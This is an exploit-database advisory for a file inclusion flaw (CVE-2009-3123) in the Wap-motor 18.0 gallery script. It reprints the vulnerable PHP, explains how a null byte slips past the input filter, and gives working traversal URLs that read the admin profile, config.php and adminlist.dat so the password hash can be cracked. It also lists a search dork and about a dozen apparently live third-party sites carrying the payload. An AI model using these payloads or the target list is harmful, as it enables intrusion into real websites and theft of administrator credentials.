Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability

2009.09.11
Credit: Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-3123
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

=============================================================== Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability =============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product : Wap-motor Vesrion : v 18.0 dork: "Powered by Wap-motor" site: http://visavi.net download: http://visavi.net/download/down.php?action=ob&did=wap-motor16&fid=MOTOR18.zip& In this version of vulnerability photo gallery script. Namely file http://[PATH]/gallery/gallery.php Let's code! PHP code: <?php require_once"../template/start.php"; require_once"../template/regglobals.php"; require_once"../template/config.php"; require_once"../template/functions.php"; $image=check($image); $ext = strtolower(substr($image, strrpos($image, '.') + 1)); if($ext=="jpg" || $ext=="gif" || $ext=="png"){ if($ext=="jpg"){$ext="jpeg";} $filename = BASEDIR."local/datagallery/$image"; $filename = file_get_contents($filename); header('Content-Disposition: inline; filename="'.$image.'"'); header("Content-type: image/$ext"); header("Content-Length: ".strlen($filename)); echo $filename; } ?> file : ./template/regglobals.php ... if (!ini_get('register_globals')) { while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value; } ... foreach ($_GET as $check_url) { if ((eregi("<[^>]*script*\"?[^>]*>", $check_url)) || (eregi("<[^>]*object*\"?[^>]*>", $check_url)) || (eregi("<[^>]*iframe*\"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) || (eregi("<[^>]*meta*\"?[^>]*>", $check_url)) || (eregi("<[^>]*style*\"?[^>]*>", $check_url)) || (eregi("<[^>]*form*\"?[^>]*>", $check_url)) || (eregi("\([^>]*\"?[^)]*\)", $check_url)) || (eregi("\"", $check_url)) || (eregi("\'", $check_url)) || (eregi("\./", $check_url)) || (eregi("//", $check_url)) || (eregi("<", $check_url)) || (eregi(">", $check_url))) { header ("Location: ".BASEDIR."index.php?isset=403&".SID); exit; } ... Here, the picture has become clearer to see the algorithm! Algorithm for action script when processing $ _GET [ 'image']: 1. while (list ($ key, $ value) = each ($ _GET)) $ GLOBALS [$ key] = $ value; 2. foreach ($ _GET as $ check_url) ... 3. $ ext = strtolower (substr ($ image, strrpos ($ image, '.') + 1)); 4. header ( 'Content-Disposition: inline; filename ="'.$ image .'"'); header ( "Content-type: image / $ ext"); header ( "Content-Length:". strlen ($ filename)); echo $ filename; That's what we have: http://[PATH]/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif Consider, image =% 00 - so we Nulle-byte stop processing eregi (). (Thanks for the article Elekt'u fatal mistake Php. Part Two.) .. / profil / Twost.prof% 00 - inkludim profile file (do not forget to change the admin username to Twost) and trims the same Nulle-byte extension . gif - but it substitute for the true value goes here header ( "Content-type: image / $ ext"); The picture we have of course not appear, but it is not empty! Open the text editor and see the base of the account admin, you only have to decipher the hash! That's it! Example: http://mobile-world.dbhost.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://margarita.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://sat-tv.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://kod.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://fuckyou.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://bazooka.pp.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://metra.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://chermo.net.ru/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif http://sefan.us/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif http://landark.net.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://vseicq.org.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]

References:

http://xforce.iss.net/xforce/xfdb/52810
http://secunia.com/advisories/36416
http://packetstormsecurity.org/0908-exploits/wapmotor-lfi.txt
http://osvdb.org/57426


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top